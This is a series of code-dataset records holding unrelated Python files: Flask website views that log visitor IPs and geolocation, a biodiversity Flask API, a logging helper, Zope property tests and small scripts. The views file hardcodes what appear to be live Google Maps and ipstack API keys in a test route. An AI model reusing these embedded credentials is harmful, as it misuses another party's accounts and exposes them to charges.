IP:{0}'.format(session.get('clientIPA')))\n session.pop('VisitID', None) # delete visitID\n session.pop('VisitNumber', None) # delete visitNumber\n session.pop('VisitPointID', None) # delete visitpointID\n session.pop('VisitPointNumber', None) # delete visitpointNumber\n session.pop('clientIPA', None) # delete clientIPA\n\n log_info('check cookies consent expiry')\n if 'cookies_consent_time' in session:\n strdt = session['cookies_consent_time']\n t1 = datetime.strptime(strdt, \"%Y-%m-%d %H:%M:%S\")\n t2 = datetime.now()\n duration = t2 - t1\n duration_sec = duration.total_seconds()\n #duration_min = divmod(duration_sec, 60)[0]\n #print('XXXX-check-duration',duration_sec, duration_min)\n if duration_sec >= 0:\n session['cookies_consent'] = 'EXPIRED'\n app.logger.critical('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! COOKIES CONSENT EXPIRED !!! IP:{0}'.format(session.get('clientIPA')))\n else:\n session['cookies_consent'] = 'YES'\n else:\n session['cookies_consent'] = 'NO'\n\n #2. init spash forms with authenticated user info\n log_info('move authenticated user info to the (splash) forms')\n if current_user.is_authenticated:\n if app.forgetpasswordform:\n app.forgetpasswordform.email.data = current_user.email\n if app.contactusform:\n app.contactusform.firstName.data = current_user.firstName\n app.contactusform.lastName.data = current_user.lastName\n app.contactusform.company.data = current_user.company\n app.contactusform.jobTitle.data = current_user.jobTitle\n app.contactusform.email.data = current_user.email\n app.contactusform.contact_message.data = ''\n\n\n #3. log the visit in db\n log_info('log the visit in DB')\n log_visit()\n \n session.modified = True\n\n log_finish('@app.before_request')\n\n@app.after_request\ndef set_cookies_after_request(response):\n log_start('@app.after_request')\n log_finish('@app.after_request')\n log_request_finish(request.base_url)\n return response\n\n###########################################################################\n###########################################################################\n###########################################################################\n### module functions\n###########################################################################\n###########################################################################\n###########################################################################\ndef set_deviceandscreen_properties(width, height, devicepixelratio):\n session['screen_width'] = width\n session['screen_height'] = height\n session['device_pixelration'] = devicepixelratio\n session['splash_forms_width'] = str(width - 100)+'px'\n return\n#############################################################\n#############################################################\n#############################################################\n### routes and pages\n#############################################################\n#############################################################\n#############################################################\n@app.route('/')\ndef homepage():\n page_name = 'home'\n page_function = 'homepage'\n page_template = 'page_templates/landing_page.html'\n log_page(page_name, page_function, page_template)\n return render_template('page_templates/landing_page.html')\n\n@app.route('/landingpage')\ndef landingpage():\n page_name = 'landingpage'\n page_function = 'landingpage'\n page_template = 'page_templates/landing_page.html'\n log_page(page_name, page_function, 
page_template)\n return render_template('page_templates/landing_page.html')\n\n@app.route('/contact')\ndef contact():\n page_name = 'contact'\n page_function = 'contact'\n page_template = 'page_templates/contact.html'\n log_page(page_name, page_function, page_template)\n return render_template('page_templates/contact.html')\n\n@app.route('/about')\ndef about():\n page_name = 'about'\n page_function = 'about'\n page_template = 'page_templates/about.html'\n log_page(page_name, page_function, page_template)\n return render_template('page_templates/about.html')\n\n@app.route('/company')\ndef company():\n page_name = 'company'\n page_function = 'company'\n page_template = 'page_templates/company.html'\n log_page(page_name, page_function, page_template)\n return render_template('page_templates/company.html')\n\n@app.route('/services')\ndef services():\n page_name = 'services'\n page_function = 'services'\n page_template = 'page_templates/services.html'\n log_page(page_name, page_function, page_template)\n return render_template('page_templates/services.html')\n\n@app.route('/why')\ndef why():\n page_name = 'why'\n page_function = 'why'\n page_template = 'page_templates/why.html'\n log_page(page_name, page_function, page_template)\n return render_template('page_templates/why.html')\n\n@app.route('/research')\ndef research():\n page_name = 'research'\n page_function = 'research'\n page_template = 'page_templates/research.html'\n log_page(page_name, page_function, page_template)\n return render_template('page_templates/research.html')\n\n@app.route('/academy')\ndef academy():\n page_name = 'academy'\n page_function = 'academy'\n page_template = 'page_templates/academy.html'\n log_page(page_name, page_function, page_template)\n return render_template('page_templates/academy.html')\n\n@app.route('/knowledge')\ndef knowledge():\n page_name = 'knowledge'\n page_function = 'knowledge'\n page_template = 'page_templates/knowledge.html'\n log_page(page_name, page_function, page_template)\n return render_template('page_templates/knowledge.html')\n\n@app.route('/prototypes')\ndef prototypes():\n page_name = 'prototypes'\n page_function = 'prototypes'\n page_template = 'page_templates/prototypes.html'\n log_page(page_name, page_function, page_template)\n return render_template('page_templates/prototypes.html')\n\n@app.route('/cookies_policy')\ndef cookies_policy():\n page_name = 'cookies policy'\n page_function = 'cookies_policy'\n page_template = 'page_templates/cookies_policy.html'\n log_page(page_name, page_function, page_template)\n return render_template('page_templates/cookies_policy.html')\n\n@app.route('/privacy_policy')\ndef privacy_policy():\n page_name = 'privacy policy'\n page_function = 'privacy_policy'\n page_template = 'page_templates/privacy_policy.html'\n log_page(page_name, page_function, page_template)\n return render_template('page_templates/privacy_policy.html')\n\n@app.route('/terms_and_conditions')\ndef terms_and_conditions():\n page_name = 'terms and conditions'\n page_function = 'terms_and_conditions'\n page_template = 'page_templates/terms_and_conditions.html'\n log_page(page_name, page_function, page_template)\n return render_template('page_templates/terms_and_conditions.html')\n\n@app.route('/language/')\ndef set_language(language=None):\n log_route('change language', 'set_language')\n session['language'] = language\n log_info('language set to {0}'.format(language))\n return redirect(session['lastpageURL'])\n\n@app.route('/cookiesconsentform/', methods=['GET', 'POST'])\ndef 
cookiesconsentform(answer):\n page_name = 'cookiesconsentform-splash-form'\n page_function = 'cookiesconsentform'\n page_form = 'splash_form_cookiesconsent.html'\n log_splash_page(page_name, page_function, '', '', page_form)\n if answer.upper() == 'AGREE':\n dt = datetime.now() + timedelta(days=31)\n else:\n #dt = datetime.now() + timedelta(seconds=60)\n dt = datetime.now() + timedelta(days=1)\n strdt = dt.strftime(\"%Y-%m-%d %H:%M:%S\")\n session['cookies_consent_time'] = strdt\n session['cookies_consent'] = 'YES'\n flash('Thank You. Your data are protected', 'success')\n return redirect(session.get('lastpageURL'))\n\n#############################################################\n#############################################################\n#############################################################\n### client-to-server utilities:\n#############################################################\n#############################################################\n#############################################################\n@app.route('/location', methods=['POST'])\ndef location():\n latitude = request.json.get('latitude')\n longitude = request.json.get('longitude')\n session['geolocation'] = [latitude, longitude]\n log_variable('geolocation', session.get('geolocation'))\n set_geolocation(latitude, longitude)\n log_route('geolocation', 'geolocation')\n return('')\n@app.route('/deviceandscreen', methods=['POST'])\ndef deviceandscreen():\n width = request.json.get('width')\n height = request.json.get('height')\n devicepixelratio = request.json.get('devicepixelratio')\n session['device'] = [width, height, devicepixelratio]\n log_variable('device', session.get('device'))\n set_deviceandscreen_properties(width, height, devicepixelratio)\n log_route('deviceandscreen', 'deviceandscreen')\n return('')\n\n#############################################################\n#############################################################\n#############################################################\n### prototypes:\n#############################################################\n#############################################################\n#############################################################\n@app.route('/myBank')\n@login_required\ndef myBank():\n page_name = 'myBank-prototype'\n page_function = 'myBank'\n page_template = 'myBank/myBank_index.html'\n page_form = ''\n log_page(page_name, page_function, page_template, '', page_form)\n return render_template(\n 'mybank/mybank_index.html'\n , title='myBank'\n , message='open banking prototype........'\n )\n\n@app.route('/myGame')\ndef myGame():\n page_name = 'myGame-prototype'\n page_function = 'myGame'\n page_template = 'myGame/myGame.html'\n page_form = ''\n log_page(page_name, page_function, page_template, '', page_form)\n return render_template(\n 'myGame/myGame.html'\n , title='myGame'\n , message='gaming prototype........'\n )\n#############################################################\n#############################################################\n#############################################################\n### test utilities:\n#############################################################\n#############################################################\n#############################################################\n@app.route('/test_cookiesconsent')\ndef test_cookiesconsent():\n dt = datetime.now() - timedelta(days=111)\n strdt = dt.strftime(\"%Y-%m-%d %H:%M:%S\")\n session['cookies_consent_time'] = strdt\n session['cookies_consent'] = 'NO'\n 
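# --- illustrative note, not part of the original route ---
# test_cookiesconsent only has to push the stored timestamp into the past:
# the before_request hook shown earlier re-derives expiry from it on the next
# request, essentially via (same "%Y-%m-%d %H:%M:%S" format used throughout):
#
#   t1 = datetime.strptime(session['cookies_consent_time'], "%Y-%m-%d %H:%M:%S")
#   if (datetime.now() - t1).total_seconds() >= 0:
#       session['cookies_consent'] = 'EXPIRED'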
return redirect(session.get('lastpageURL'))\n\n@app.route('/test_google_api')\ndef test_google_api():\n page_name = 'terms and conditions'\n page_function = 'terms_and_conditions'\n page_template = 'page_templates/terms_and_conditions.html'\n log_page(page_name, page_function, page_template)\n clientip = '213.149.173.194'\n GOOGLE_MAPS_API_KEY='AIzaSyCstqUccUQdIhV69NtEGuzASxBQX5zPKXY'\n if session.get('geolocation'):\n try:\n lat = session.get('geolocation')[0] \n lon = session.get('geolocation')[1] \n except:\n lat = 0\n lon = 0\n return render_template('page_templates/terms_and_conditions.html')\n else:\n lat = -1\n lon = -1\n return render_template('page_templates/terms_and_conditions.html')\n\n log_info('-----lat,lon {0},{1}'.format(lat, lon))\n #lat = session.get('geolocation')[0] \n #lon = session.get('geolocation')[1] \n\n # api_url = 'https://www.googleapis.com/geolocation/v1/geolocate?key=AIzaSyCstqUccUQdIhV69NtEGuzASxBQX5zPKXY\n path = 'http://api.ipstack.com/{0}?access_key={1}'.format(clientip, '4022cfd2249c3431953ecf599152892e')\n path = 'https://maps.googleapis.com/maps/api/geocode/json?latlng={0},{1}&key={2}'.format(lat,lon,GOOGLE_MAPS_API_KEY)\n log_variable('apistack geolocation path', path)\n #print (path)\n r = requests.get(path) # the geocoding endpoint expects GET; requests.post here was a bug\n log_variable('request',r)\n #reply_code=r.status_code\n # if not r.status_code == requests.codes.ok:\n #response = {}\n if r:\n response = r.json()\n address_comps = response['results'][0]['address_components']\n types = ['locality', 'administrative_area_level_1', 'country', 'postal_code']\n filter_method = lambda x: len(set(x['types']).intersection(types))\n res=filter(filter_method, address_comps)\n for geoname in res:\n common_types = set(geoname['types']).intersection(set(types))\n log_info ('{} ({})'.format(geoname['long_name'], ', '.join(common_types)))\n # nam = ', '.join(common_types)\n # val = geoname['long_name']\n # print(nam, val)\n\n formatted_address = response['results'][0]['formatted_address']\n log_info ('{} ({})'.format(formatted_address, 'formatted address'))\n\n # #log_variable('apistack geolocation result', response)\n # log_info('==================================================')\n # #for key, value in response.items():\n # #log_variable('---'+key, value)\n # #log_info('------------------')\n # log_info('==================================================')\n # res= response['results']['address_components']\n # for item in res:\n # log_variable('--- ---',item)\n # for key, value in item.items():\n # log_variable('--- --- ---'+key, value)\n\n# import json\n# import urllib2\n\n# def get_geonames(lat, lng, types):\n# url = 'http://maps.googleapis.com/maps/api/geocode/json' + \\\n# '?latlng={},{}&sensor=false'.format(lat, lng)\n# jsondata = json.load(urllib2.urlopen(url))\n# address_comps = jsondata['results'][0]['address_components']\n# filter_method = lambda x: len(set(x['types']).intersection(types))\n# return filter(filter_method, address_comps)\n\n# lat, lng = 59.3, 18.1\n# types = ['locality', 'administrative_area_level_1']\n\n# # Display all geographical names along with their types\n# for geoname in get_geonames(lat, lng, types):\n# common_types = set(geoname['types']).intersection(set(types))\n# print '{} ({})'.format(geoname['long_name'], ', '.join(common_types))\n\n # gmaps = googlemaps.Client(key='AIzaSyCstqUccUQdIhV69NtEGuzASxBQX5zPKXY')\n # # Geocoding an address\n # geocode_result = gmaps.geocode('1600 Amphitheatre Parkway, Mountain View, CA')\n # log_variable('geocode_result', geocode_result)\n\n # # Look up an address with 
reverse geocoding\n # reverse_geocode_result = gmaps.reverse_geocode((34.6841, 33.0379))\n # log_variable('reverse_geocode_result', reverse_geocode_result)\n\n # # Request directions via public transit\n # now = datetime.now()\n # directions_result = gmaps.directions(\"Sydney Town Hall\",\n # \"Parramatta, NSW\",\n # mode=\"transit\",\n # departure_time=now)\n # log_variable('directions_result', directions_result)\n \n #rootWindow = None\n #mapLabel = None\n\n #defaultLocation = \"Mauna Kea, Hawaii\"\n #mapLocation = defaultLocation\n #mapFileName = 'googlemap.gif'\n # https://maps.googleapis.com/maps/api/staticmap?center=Brooklyn+Bridge,New+York,NY&zoom=13&size=600x300&maptype=roadmap\n # &markers=color:blue%7Clabel:S%7C40.702147,-74.015794&markers=color:green%7Clabel:G%7C40.711614,-74.012318\n # &markers=color:red%7Clabel:C%7C40.718217,-73.998284\n # &key=YOUR_API_KEY\n\n #############static map\n key='&key='+GOOGLE_MAPS_API_KEY\n\n urlbase = \"http://maps.google.com/maps/api/staticmap?\"\n zoomLevel = 15\n mapType = \"satellite\" #\"roadmap\" #\"terrain\"\n width = 600\n height = 300\n markers = \"&markers=color:red|size:mid|label:VisitPoint|{},{}\".format(lat, lon)\n args = \"center={},{}&zoom={}&size={}x{}&format=gif{}\".format(lat,lon,zoomLevel,width,height,markers)\n mapType = \"&maptype={}\".format(mapType)\n google_maps_url = urlbase+args+mapType+key\n return redirect(google_maps_url)\n \n #############dynamic map\n key='&key='+GOOGLE_MAPS_API_KEY\n urlbase = \"https://www.google.com/maps/@?api=1&map_action=map\"\n args = \"&center={},{}&zoom={}&size={}x{}&format=gif{}\".format(lat,lon,zoomLevel,width,height,markers)\n #&center=-33.712206,150.311941&zoom=12&basemap=terrain\n google_maps_url = urlbase+args+mapType+key\n return redirect(google_maps_url)\n\n # https://www.google.co.uk/maps/place/@{0},{1}\".format(session.get('longitude'),session.get('longitude')) %}\n # {% set href=href+\"\" %}\n #
    \n # {{session.get('latitude')}},{{session.get('longitude')}}\n # \n return render_template('page_templates/terms_and_conditions.html')\n\n","sub_path":"website_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":24413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"504770554","text":"import sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import inspect, create_engine, func, desc\nfrom sqlalchemy.engine import reflection\n\nfrom flask import (\n Flask,\n render_template,\n jsonify,\n request,\n redirect)\n\n\n#################################################\n# Flask Setup\n#################################################\napp = Flask(__name__)\n\n#################################################\n# Database Setup\n#################################################\nfrom flask_sqlalchemy import SQLAlchemy\nengine = create_engine(\"sqlite:///DataSets/belly_button_biodiversity.sqlite\")\n\n\n# Reflecting db into a new model\nBase = automap_base()\n\n# reflect tables\nBase.prepare(engine, reflect=True)\n\n# Save tables to classes\nMtadata = Base.classes.samples_metadata\nOtu = Base.classes.otu\nSamples = Base.classes.samples\n\n#initiate a session\nsession = Session(engine)\n\n#this is from the pets activity - what does it do?\ndef __repr__(self):\n return '' % (self.name)\n\n# Create a route to render index.html homepage template\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\")\n\n#Create a route that renders a list of the sample names\n@app.route(\"/names\")\ndef names_list():\n\n # Create inspector and connect it to the engine\n inspector = inspect(engine)\n\n # Collect the names of the tables within the db\n tables = inspector.get_table_names()\n\n # using the inspector to print the column names of tables\n columns = inspector.get_columns('samples')\n\n col_names = []\n\n for column in columns[1:]:\n col_names.append(column['name'])\n\n return jsonify(col_names)\n\n# List of OTU descriptions in the\n# ex . 
\"Archaea;Euryarchaeota;Halobacteria;Halobacteriales;Halobacteriaceae;Halococcus\",\n# \"Bacteria\",\n\n@app.route(\"/otu\")\ndef description():\n #reviewed the table elements in DB Browser for SQLite, lowers_taxonomic_unit is the name of the column\n results = session.query(otu.lowest_taxonomic_unit_found).all()\n\n otu_results = []\n\n for result in results:\n otu_results.append(result[0])\n\n return jsonify(otu_results)\n\n@app.route('/metadata/')\ndef sample_meta(sample):\n sample_id = sample[3:]\n result = session.query(Mtadata.AGE, Mtadata.BBTYPE, Mtadata.ETHNICITY, Mtadata.GENDER, Mtadata.LOCATION,\\\n Mtadata.SAMPLEID).filter(Mtadata.SAMPLEID==sample_id).first()\n\n metadict = {\n \"AGE\": result[0],\n \"BBTYPE\": result[1],\n \"ETHNICITY\": result[2],\n \"GENDER\": result[3],\n \"LOCATION\": result[4],\n \"SAMPLEID\": result[5]\n }\n return jsonify(metadict)\n\n# Washing frequency\n@app.route('/wfreq/')\ndef wfreq(sample):\n sample_id = sample[3:]\n result = session.query(Mtadata.WFREQ, Mtadata.SAMPLEID)\\\n .filter(Mtadata.SAMPLEID == sample_id).first()\n return jsonify(result[0])\n\n# OTU IDs and sample values\n@app.route('/samples/')\ndef samp(sample):\n sample_id_query = f\"Samples.{sample}\"\n results = session.query(Samples.otu_id,\\\n sample_id_query)\\\n .order_by(desc(sample_id_query))\n sampdict = {\"otu_ids\": [result[0] for result in results],\n \"sample_values\": [result[1] for result in results]}\n return jsonify(sampdict)\n\n\nif __name__ == \"__main__\":\n app.run()\n\n\n","sub_path":"BellyButton/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"544632010","text":"import webbrowser\nimport time\n\ntotal = 3\ncount = 0\n\nprint(\"this program started on \"+time.ctime())\nwhile(count < total):\n time.sleep(2*60*60)\n webbrowser.open(\"https://www.youtube.com/watch?v=-bNwqXvMuB8\")\n count += 1","sub_path":"takeAbreak.py","file_name":"takeAbreak.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"194759514","text":"# import os\n# import ConfigParser\nimport logging\nimport time\nimport lib.getconfig\n# import datetime\n# import json\n# import pushdata\n\n# config = ConfigParser.RawConfigParser()\n# config.read(os.path.split(os.path.dirname(__file__))[0] + '/conf/config.ini')\n# tsdb_url = config.get('TSDB', 'url')\n#c = pycurl.Curl()\n\ncluster_name = lib.getconfig.getparam('SelfConfig', 'cluster_name')\nhost_group = lib.getconfig.getparam('SelfConfig', 'host_group')\ndebug_log = lib.getconfig.getparam('SelfConfig', 'debug_log')\ntsdb_type = lib.getconfig.getparam('TSDB', 'tsdtype')\nlog_file = lib.getconfig.getparam('SelfConfig', 'log_file')\n\ndef print_message(message):\n logger = logging.getLogger(\"PuyPuy\")\n logger.setLevel(logging.INFO)\n logging.basicConfig(filename=log_file, level=logging.INFO)\n logging.info(str(time.strftime(\" [%F %H %M:%S] \")) + message)\n\n# def print_error(module, e):\n# def send_error_msg():\n# if pushdata.tsd_oddeye is True:\n# cluster_name = config.get('SelfConfig', 'cluster_name')\n# error_msg = str(e).replace('[', '').replace(']', '').replace('<', '').replace('>', '').replace('(', '').replace(')', '').replace(\"'\", '').replace('\"', '')\n# timestamp = int(datetime.datetime.now().strftime(\"%s\"))\n# error_data = []\n# error_data.append({\"metric\": module,\n# \"timestamp\": timestamp,\n# \"value\": 16,\n# 
\"message\": error_msg,\n# \"status\": \"ERROR\",\n# \"type\": \"Special\",\n# \"reaction\": pushdata.negative_handler,\n# \"tags\": {\"host\": pushdata.hostname, \"cluster\": cluster_name, \"group\": host_group}})\n# send_err_msg = json.dumps(error_data)\n# if pushdata.sandbox is True:\n# barlus_style = 'UUID=' + pushdata.oddeye_uuid + '&sandbox=true&data='\n# else:\n# barlus_style = 'UUID=' + pushdata.oddeye_uuid + '&data='\n#\n# send_error_data = barlus_style + send_err_msg\n#\n# jonson=pushdata.JonSon()\n#\n# def httt_set_opt(url, data):\n# c.setopt(pycurl.URL, url)\n# c.setopt(pycurl.POST, 0)\n# c.setopt(pycurl.POSTFIELDS, data)\n# c.setopt(pycurl.VERBOSE, 0)\n# c.setopt(pycurl.TIMEOUT, 3)\n# c.setopt(pycurl.NOSIGNAL, 5)\n# c.setopt(pycurl.USERAGENT, 'PuyPuy v.03')\n# c.setopt(pycurl.ENCODING, \"gzip,deflate\")\n# c.setopt(pycurl.WRITEFUNCTION, lambda x: None)\n#\n# httt_set_opt(pushdata.tsdb_url, send_error_data)\n# c.setopt(pycurl.POSTFIELDS, send_error_data)\n# c.perform()\n# print_message(\" %s : \" % module + str(e))\n# else:\n# print_message(\" %s : \" % module + str(e))\n# try:\n# if module == 'pushdata':\n# print_message(\" %s : \" % \"Cannot connect to Barlus\" + str(e))\n# pass\n# else:\n# send_error_msg()\n# except Exception as err:\n# print_message(\" %s : \" % \"Cannot send error\" + str(err))\n\n","sub_path":"lib/puylogger.py","file_name":"puylogger.py","file_ext":"py","file_size_in_byte":3251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"205409373","text":"##############################################################################\n#\n# Copyright (c) 2004 Zope Corporation and Contributors. All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). 
A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\" Site properties export / import unit tests.\n\n$Id$\n\"\"\"\n\nimport unittest\nimport Testing\nimport Zope\nZope.startup()\n\nfrom OFS.Folder import Folder\n\nfrom common import BaseRegistryTests\nfrom common import DummyExportContext\nfrom common import DummyImportContext\n\n\n_EMPTY_EXPORT = \"\"\"\\\n\n\n\n\"\"\"\n\n_NORMAL_EXPORT = \"\"\"\\\n\n\n Foo\n \n \n\n\"\"\"\n\n\nclass DummySite(Folder):\n\n _properties = ()\n\n\nclass _SitePropertiesSetup(BaseRegistryTests):\n\n def _initSite(self, foo=2, bar=2):\n\n self.root.site = DummySite()\n site = self.root.site\n\n if foo > 0:\n site._setProperty('foo', '', 'string')\n if foo > 1:\n site._updateProperty('foo', 'Foo')\n\n if bar > 0:\n site._setProperty( 'bar', (), 'tokens' )\n if bar > 1:\n site._updateProperty( 'bar', ('Bar',) )\n\n return site\n\n\nclass SitePropertiesConfiguratorTests(_SitePropertiesSetup):\n\n def _getTargetClass(self):\n\n from Products.CMFSetup.properties import SitePropertiesConfigurator\n return SitePropertiesConfigurator\n\n def test_listSiteInfos_normal(self):\n\n site = self._initSite()\n\n EXPECTED = [ { 'id': 'foo',\n 'value': 'Foo',\n 'elements': (),\n 'type': 'string',\n 'select_variable': None },\n { 'id': 'bar',\n 'value': '',\n 'elements': ('Bar',),\n 'type': 'tokens',\n 'select_variable': None } ]\n\n configurator = self._makeOne(site)\n\n site_info = configurator.listSiteInfos()\n self.assertEqual( len(site_info), len(EXPECTED) )\n\n for found, expected in zip(site_info, EXPECTED):\n self.assertEqual(found, expected)\n\n def test_generateXML_empty(self):\n\n site = self._initSite(0, 0)\n configurator = self._makeOne(site).__of__(site)\n\n self._compareDOM(configurator.generateXML(), _EMPTY_EXPORT)\n\n def test_generateXML_normal(self):\n\n site = self._initSite()\n configurator = self._makeOne(site).__of__(site)\n\n self._compareDOM( configurator.generateXML(), _NORMAL_EXPORT )\n\n def test_parseXML_empty(self):\n\n site = self._initSite(0, 0)\n configurator = self._makeOne(site)\n site_info = configurator.parseXML(_EMPTY_EXPORT)\n\n self.assertEqual( len( site_info['properties'] ), 0 )\n\n def test_parseXML_normal(self):\n\n site = self._initSite()\n configurator = self._makeOne(site)\n site_info = configurator.parseXML(_NORMAL_EXPORT)\n\n self.assertEqual( len( site_info['properties'] ), 2 )\n\n info = site_info['properties'][0]\n self.assertEqual( info['id'], 'foo' )\n self.assertEqual( info['value'], 'Foo' )\n self.assertEqual( len( info['elements'] ), 0 )\n\n info = site_info['properties'][1]\n self.assertEqual( info['id'], 'bar' )\n self.assertEqual( info['value'], '' )\n self.assertEqual( len( info['elements'] ), 1 )\n self.assertEqual( info['elements'][0], 'Bar' )\n\n\nclass Test_exportSiteProperties(_SitePropertiesSetup):\n\n def test_empty(self):\n\n site = self._initSite(0, 0)\n context = DummyExportContext(site)\n\n from Products.CMFSetup.properties import exportSiteProperties\n exportSiteProperties(context)\n\n self.assertEqual( len(context._wrote), 1 )\n filename, text, content_type = context._wrote[0]\n self.assertEqual(filename, 'properties.xml')\n self._compareDOM(text, _EMPTY_EXPORT)\n 
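# (editor's note, added) contract under test: the exporter registers exactly one 'properties.xml' payload whose DOM matches _EMPTY_EXPORT and whose content type is text/xml\n 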
self.assertEqual(content_type, 'text/xml')\n\n def test_normal(self):\n\n site = self._initSite()\n context = DummyExportContext( site )\n\n from Products.CMFSetup.properties import exportSiteProperties\n exportSiteProperties(context)\n\n self.assertEqual( len(context._wrote), 1 )\n filename, text, content_type = context._wrote[0]\n self.assertEqual(filename, 'properties.xml')\n self._compareDOM(text, _NORMAL_EXPORT)\n self.assertEqual(content_type, 'text/xml')\n\n\nclass Test_importSiteProperties(_SitePropertiesSetup):\n\n def test_empty_default_purge(self):\n\n site = self._initSite()\n\n self.assertEqual( len( site.propertyIds() ), 2 )\n self.failUnless( 'foo' in site.propertyIds() )\n self.assertEqual( site.getProperty('foo'), 'Foo' )\n self.failUnless( 'bar' in site.propertyIds() )\n self.assertEqual( site.getProperty('bar'), ('Bar',) )\n\n context = DummyImportContext(site)\n context._files['properties.xml'] = _EMPTY_EXPORT\n\n from Products.CMFSetup.properties import importSiteProperties\n importSiteProperties(context)\n\n self.assertEqual( len( site.propertyIds() ), 0 )\n\n def test_empty_explicit_purge(self):\n\n site = self._initSite()\n\n self.assertEqual( len( site.propertyIds() ), 2 )\n self.failUnless( 'foo' in site.propertyIds() )\n self.assertEqual( site.getProperty('foo'), 'Foo' )\n self.failUnless( 'bar' in site.propertyIds() )\n self.assertEqual( site.getProperty('bar'), ('Bar',) )\n\n context = DummyImportContext(site, True)\n context._files['properties.xml'] = _EMPTY_EXPORT\n\n from Products.CMFSetup.properties import importSiteProperties\n importSiteProperties(context)\n\n self.assertEqual( len( site.propertyIds() ), 0 )\n\n def test_empty_skip_purge(self):\n\n site = self._initSite()\n\n self.assertEqual( len( site.propertyIds() ), 2 )\n self.failUnless( 'foo' in site.propertyIds() )\n self.assertEqual( site.getProperty('foo'), 'Foo' )\n self.failUnless( 'bar' in site.propertyIds() )\n self.assertEqual( site.getProperty('bar'), ('Bar',) )\n\n context = DummyImportContext(site, False)\n context._files['properties.xml'] = _EMPTY_EXPORT\n\n from Products.CMFSetup.properties import importSiteProperties\n importSiteProperties(context)\n\n self.assertEqual( len( site.propertyIds() ), 2 )\n self.failUnless( 'foo' in site.propertyIds() )\n self.assertEqual( site.getProperty('foo'), 'Foo' )\n self.failUnless( 'bar' in site.propertyIds() )\n self.assertEqual( site.getProperty('bar'), ('Bar',) )\n\n def test_normal(self):\n\n site = self._initSite(0,0)\n\n self.assertEqual( len( site.propertyIds() ), 0 )\n\n context = DummyImportContext(site)\n context._files['properties.xml'] = _NORMAL_EXPORT\n\n from Products.CMFSetup.properties import importSiteProperties\n importSiteProperties(context)\n\n self.assertEqual( len( site.propertyIds() ), 2 )\n self.failUnless( 'foo' in site.propertyIds() )\n self.assertEqual( site.getProperty('foo'), 'Foo' )\n self.failUnless( 'bar' in site.propertyIds() )\n self.assertEqual( site.getProperty('bar'), ('Bar',) )\n\n def test_normal_encode_as_ascii(self):\n\n site = self._initSite(0,0)\n\n self.assertEqual( len( site.propertyIds() ), 0 )\n\n context = DummyImportContext(site, encoding='ascii')\n context._files['properties.xml'] = _NORMAL_EXPORT\n\n from Products.CMFSetup.properties import importSiteProperties\n importSiteProperties(context)\n\n self.assertEqual( len( site.propertyIds() ), 2 )\n self.failUnless( 'foo' in site.propertyIds() )\n self.assertEqual( site.getProperty('foo'), 'Foo' )\n self.failUnless( 'bar' in site.propertyIds() )\n 
self.assertEqual( site.getProperty('bar'), ('Bar',) )\n\n\ndef test_suite():\n return unittest.TestSuite((\n unittest.makeSuite(SitePropertiesConfiguratorTests),\n unittest.makeSuite(Test_exportSiteProperties),\n unittest.makeSuite(Test_importSiteProperties),\n ))\n\nif __name__ == '__main__':\n unittest.main(defaultTest='test_suite')\n","sub_path":"CMF/tags/1.5.2-beta/CMFSetup/tests/test_properties.py","file_name":"test_properties.py","file_ext":"py","file_size_in_byte":8717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"450309733","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 30 19:55:50 2016\n\n@author: vilius\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\nimport numpy as np\n\n\n#All classes and functions performed by cells\n\n#Just cell description:\nclass Cell:\n def __init__(self, posx, posy, goal):\n self.x = posx\n self.y = posy\n self.xnew = self.x\n self.ynew = self.y\n self.goal = goal\n \n #Check if the cell spawned inside the goal\n if self.x >= self.goal.x[1] or self.x <= self.goal.x[0]:\n self.arr = False\n return \n if self.y >= self.goal.y[1] or self.y <= self.goal.y[0]:\n self.arr = False \n return \n self.arr = True \n return\n \n \n #See this cell's position relatively to other cell.\n def position(self, cell):\n if self==cell:\n return np.array([0,0])\n #Gives distance to another cell\n dist = np.sqrt((self.x - cell.x)**2 + (self.y - cell.y)**2 )\n #Gives unit vector of the direction:\n n = np.array([cell.x - self.x , cell.y - self.y]) / dist\n return n \n\n\n \"\"\"\n def arrived(self):\n if self.x >= goal.x[1] or self.x <= goal.x[0]:\n self.arr = False\n return \n if self.y >= goal.y[1] or self.y <= goal.y[0]:\n self.arr = False \n return \n self.arr = True\n return \n \"\"\"\n\n \n def move(self, xmove, ymove):\n self.xnew += xmove\n self.ynew += ymove\n return\n \n #function to update position\n def update(self):\n self.x = self.xnew\n self.y = self.ynew\n self.xnew = self.x\n self.ynew = self.y\n \n if self.x >= self.goal.x[1] or self.x <= self.goal.x[0]:\n self.arr = False\n return \n if self.y >= self.goal.y[1] or self.y <= self.goal.y[0]:\n self.arr = False \n return \n self.arr = True \n \n return\n \n\n","sub_path":"Cell.py","file_name":"Cell.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"377710702","text":"seq = 0\nwhile True:\n try:\n n, m, c = map(int, input().split())\n if n == m == c == 0:\n break\n seq += 1\n n_amperes 